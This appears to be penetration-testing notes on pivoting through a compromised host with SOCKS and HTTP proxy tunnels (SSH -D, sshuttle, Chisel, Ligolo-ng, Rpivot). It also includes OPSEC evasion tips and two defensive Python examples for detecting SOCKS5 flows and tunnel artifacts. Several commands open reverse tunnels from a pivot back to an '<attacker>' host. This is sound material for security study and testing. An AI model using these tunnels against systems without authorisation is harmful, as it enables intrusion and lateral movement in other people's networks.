# SOCKS and HTTP Proxy Tunnels

## Overview

SOCKS and HTTP proxy tunnels provide full network-layer access through a compromised host. A SOCKS proxy relays any TCP connection, while HTTP proxies encapsulate traffic in HTTP requests.
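The SOCKS5 handshake that the Overview refers to is small enough to decode by hand. The following added example (written for this page, not taken from any of the tools discussed) parses the two client messages defined in RFC 1928 so that a network monitor can confirm that a flow on an unexpected port really is a SOCKS5 session and see where it is headed; the sample bytes are constructed.

```python
import ipaddress
import struct

CMDS = {1: "CONNECT", 2: "BIND", 3: "UDP_ASSOCIATE"}

def parse_greeting(data: bytes):
    """Client greeting: VER(0x05) | NMETHODS | METHODS. Returns the offered auth methods."""
    if len(data) < 2 or data[0] != 0x05 or len(data) < 2 + data[1]:
        return None
    return sorted(data[2:2 + data[1]])      # 0x00 = no auth, 0x02 = username/password

def parse_request(data: bytes):
    """Client request: VER | CMD | RSV(0x00) | ATYP | DST.ADDR | DST.PORT."""
    if len(data) < 4 or data[0] != 0x05 or data[2] != 0x00 or data[1] not in CMDS:
        return None
    atyp, off = data[3], 4
    if atyp == 0x01 and len(data) >= off + 4:                          # IPv4, 4 raw bytes
        host, off = str(ipaddress.IPv4Address(data[off:off + 4])), off + 4
    elif atyp == 0x03 and len(data) > off and len(data) >= off + 1 + data[off]:
        n = data[off]                                                  # domain, length-prefixed
        host, off = data[off + 1:off + 1 + n].decode("ascii", "replace"), off + 1 + n
    elif atyp == 0x04 and len(data) >= off + 16:                       # IPv6, 16 raw bytes
        host, off = str(ipaddress.IPv6Address(data[off:off + 16])), off + 16
    else:
        return None
    if len(data) < off + 2:
        return None
    return {"cmd": CMDS[data[1]], "host": host, "port": struct.unpack("!H", data[off:off + 2])[0]}

def classify_client_payloads(payloads):
    """Given the first two client-to-server TCP payloads of a flow (greeting, then
    request; the server's two-byte method-selection reply sits between them),
    return a summary dict if the flow looks like SOCKS5, else None."""
    if len(payloads) < 2:
        return None
    methods, req = parse_greeting(payloads[0]), parse_request(payloads[1])
    if methods is None or req is None:
        return None
    return {"auth_methods": methods, **req}

# Constructed sample flow: "no auth" greeting, then CONNECT example.com:80
SAMPLE = [b"\x05\x01\x00",
          b"\x05\x01\x00\x03" + bytes([11]) + b"example.com" + struct.pack("!H", 80)]

if __name__ == "__main__":
    print(classify_client_payloads(SAMPLE))
```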
## SSH Dynamic Forwarding (Extended)

### SSH Config for Proxy Jumps

```bash
# ~/.ssh/config - Preconfigure proxy hosts
Host pivot1
    HostName 10.10.10.10
    User ubuntu
    IdentityFile ~/.ssh/pivot1_key
    DynamicForward 1080

Host pivot2
    HostName 172.16.0.5
    User admin
    ProxyJump pivot1
    DynamicForward 1081
```
### Multiple SOCKS Proxies

```bash
# Multiple -D flags for different SOCKS ports
ssh -D 1080 -D 1081 -D 1082 user@pivot

# Use a specific SOCKS port with proxychains
# Edit /etc/proxychains4.conf:
# socks5 127.0.0.1 1080
```
### SSHuttle (Transparent Proxy)

SSHuttle creates a transparent VPN-like proxy that routes all traffic (not just SOCKS) through an SSH tunnel. No proxychains needed — all tools work natively.

```bash
# Install SSHuttle
pip3 install sshuttle

# Basic: route 172.16.0.0/12 through pivot
sshuttle -r user@pivot 172.16.0.0/12

# With DNS tunneling
sshuttle -r user@pivot 172.16.0.0/12 --dns

# Exclude specific subnets (don't route your own traffic)
sshuttle -r user@pivot 0.0.0.0/0 --exclude 10.10.0.0/16

# With SSH key
sshuttle -r user@pivot --ssh-cmd "ssh -i ~/.ssh/key" 172.16.0.0/12

# Multiple subnets
sshuttle -r user@pivot 172.16.0.0/12 192.168.0.0/16 10.0.0.0/8

# As daemon (background)
sshuttle -r user@pivot 172.16.0.0/12 --daemon --pidfile /tmp/sshuttle.pid

# Stop
kill $(cat /tmp/sshuttle.pid)
```
### SSHuttle vs SSH -D + proxychains

| Feature | SSHuttle | SSH -D + proxychains |
|---|---|---|
| Setup | Single command | SSH + proxychains config |
| Application support | All (transparent) | Only SOCKS-aware apps |
| DNS routing | Yes (--dns) | Manual configuration |
| Performance | Kernel-level routing | User-space proxy |
| ICMP support | No | No |
| Platform | Linux only | Linux + Windows |
## Chisel (Advanced Configuration)

### Reverse SOCKS Proxy with Authentication

```bash
# Server (attacker) - with authentication and TLS
# (chisel's TLS options are spelled --tls-key and --tls-cert)
chisel server -p 8080 --reverse --auth user:pass --tls-key /tmp/key.pem --tls-cert /tmp/cert.pem

# Client (pivot) - connect with auth
chisel client --auth user:pass https://<attacker>:8080 R:socks

# Multiple reverse forwards
chisel client --auth user:pass https://<attacker>:8080 \
    R:socks \
    R:8080:172.16.0.10:80 \
    R:3306:172.16.0.20:3306
```
### Chisel Server Clustering

```bash
# Start multiple chisel servers for redundancy
chisel server -p 8080 --reverse &
chisel server -p 8081 --reverse &

# Client connects to the primary; chisel has no built-in fail-over between
# servers, so the client must be restarted against 8081 if 8080 goes down
chisel client https://<attacker>:8080 R:socks
```
## Ligolo-ng (Advanced Configuration)

### Multiple Sessions

```bash
# Proxy (attacker) - accept multiple agents
# (the proxy listens directly; it is not run through proxychains)
sudo ./proxy -selfcert -laddr 0.0.0.0:11601

# Agent 1 (pivot 1)
./agent -connect <attacker>:11601 -ignore-cert

# Agent 2 (pivot 2)
./agent -connect <attacker>:11601 -ignore-cert

# In Ligolo-ng prompt:
# session    -> list available sessions
# session 1  -> switch to session 1
# session 2  -> switch to session 2
# ifconfig   -> show the agent's network interfaces for the current session
# start      -> start routing for the current session
```
### Listener Management

```text
# In Ligolo-ng prompt:
# listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80 --tcp
# This opens a listener on the agent (pivot) and relays connections back
# through the tunnel: pivot:8080 -> attacker:80 (the destination is reached
# from the proxy side)
# listener_list
# listener_stop 0
```
## Rpivot (Reverse SOCKS Proxy)

Rpivot is a Python-based reverse SOCKS proxy that works well in restricted environments where you can't upload large binaries.

```bash
# Install
git clone https://github.com/klsecservices/rpivot.git
cd rpivot
pip install -r requirements.txt

# Server (attacker) - listen for reverse connection
python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-type socks

# Client (pivot) - connect back to attacker
python client.py --server-ip <attacker> --server-port 9999

# Use the SOCKS proxy
proxychains4 nmap -sn 172.16.0.0/24

# Through NTLM proxy (corporate web proxy)
python client.py --server-ip <attacker> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --ntlm-proxy-user domain\\user --ntlm-proxy-pass password
```
### Rpivot vs Chisel

| Feature | Rpivot | Chisel |
|---|---|---|
| Language | Python | Go |
| Binary size | Small (script) | Larger (~8MB) |
| NTLM proxy support | Yes | No |
| Cross-platform | Python required | Single binary |
| Speed | Slower | Faster |
## OPSEC Considerations

- SSHuttle modifies the kernel routing table — detectable by host-based monitoring
- Chisel over plain HTTP is detectable by traffic analysis (enable TLS on the server with --tls-key/--tls-cert)
- Rpivot creates a Python process that may stand out in process listings
- Ligolo-ng creates a TUN interface visible in ip addr and ifconfig
- Multiple SOCKS connections through the same proxy create a traffic pattern that NIDS can detect
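The host-side artifacts listed above can be checked mechanically. This added example (not from the original page or from any of the tools it covers) scans constructed samples of ip -o link and iptables-save -t nat output for TUN interfaces and nat REDIRECT chains; the interface name ligolo and the chain pattern sshuttle-<port> are assumptions based on those tools' defaults.

```python
import re

# Constructed sample output of "ip -o link show" (one interface per line, fields
# separated by a backslash); "ligolo" is assumed to be ligolo-ng's default TUN name.
IP_LINK = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000\\    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP mode DEFAULT group default qlen 1000\\    link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff
3: ligolo: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN mode DEFAULT group default qlen 500\\    link/none
"""

# Constructed sample of "iptables-save -t nat"; the sshuttle-<local port> chain
# name is an assumption taken from sshuttle's documented behaviour.
IPTABLES_NAT = """\
*nat
:PREROUTING ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:sshuttle-12300 - [0:0]
-A PREROUTING -j sshuttle-12300
-A OUTPUT -j sshuttle-12300
-A sshuttle-12300 -d 172.16.0.0/12 -p tcp -j REDIRECT --to-ports 12300
COMMIT
"""

def find_tun_interfaces(ip_link_out: str):
    """Names of interfaces with no link-layer address (link/none) and the
    POINTOPOINT+NOARP flags typical of a user-space TUN device."""
    found = []
    for m in re.finditer(r"^\d+: ([^:@\s]+): <([^>]*)>.*?link/(\S+)", ip_link_out, re.M):
        name, flags, link = m.group(1), set(m.group(2).split(",")), m.group(3)
        if link == "none" and {"POINTOPOINT", "NOARP"} <= flags:
            found.append(name)
    return found

def find_redirect_rules(iptables_save_out: str):
    """TCP REDIRECT rules in user-defined nat chains: traffic for a remote subnet
    bounced to a local port is how sshuttle hooks outbound connections."""
    rules = []
    for line in iptables_save_out.splitlines():
        m = re.match(r"-A (\S+) -d (\S+) -p tcp .*-j REDIRECT --to-ports (\d+)$", line)
        if m and m.group(1) not in ("PREROUTING", "OUTPUT", "POSTROUTING"):
            rules.append({"chain": m.group(1), "dst": m.group(2), "port": int(m.group(3))})
    return rules

def audit(ip_link_out: str, iptables_save_out: str):
    """Combine both checks into one finding set for a host-based monitor."""
    return {"tun_interfaces": find_tun_interfaces(ip_link_out),
            "redirect_rules": find_redirect_rules(iptables_save_out)}

if __name__ == "__main__":
    print(audit(IP_LINK, IPTABLES_NAT))
```

On a live host, feed the functions the real output of ip -o link show and iptables-save -t nat; a TUN device or a REDIRECT chain that nobody provisioned is worth an alert.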
## Cross-References

- 07 - Post-Exploitation — Basic SSH -D, Chisel, Ligolo-ng setup
- Web Tunnels — When only HTTP egress is available
- SSH Port Forwarding — Single-port SSH forwarding
- Chaining Proxies — Multi-hop SOCKS chains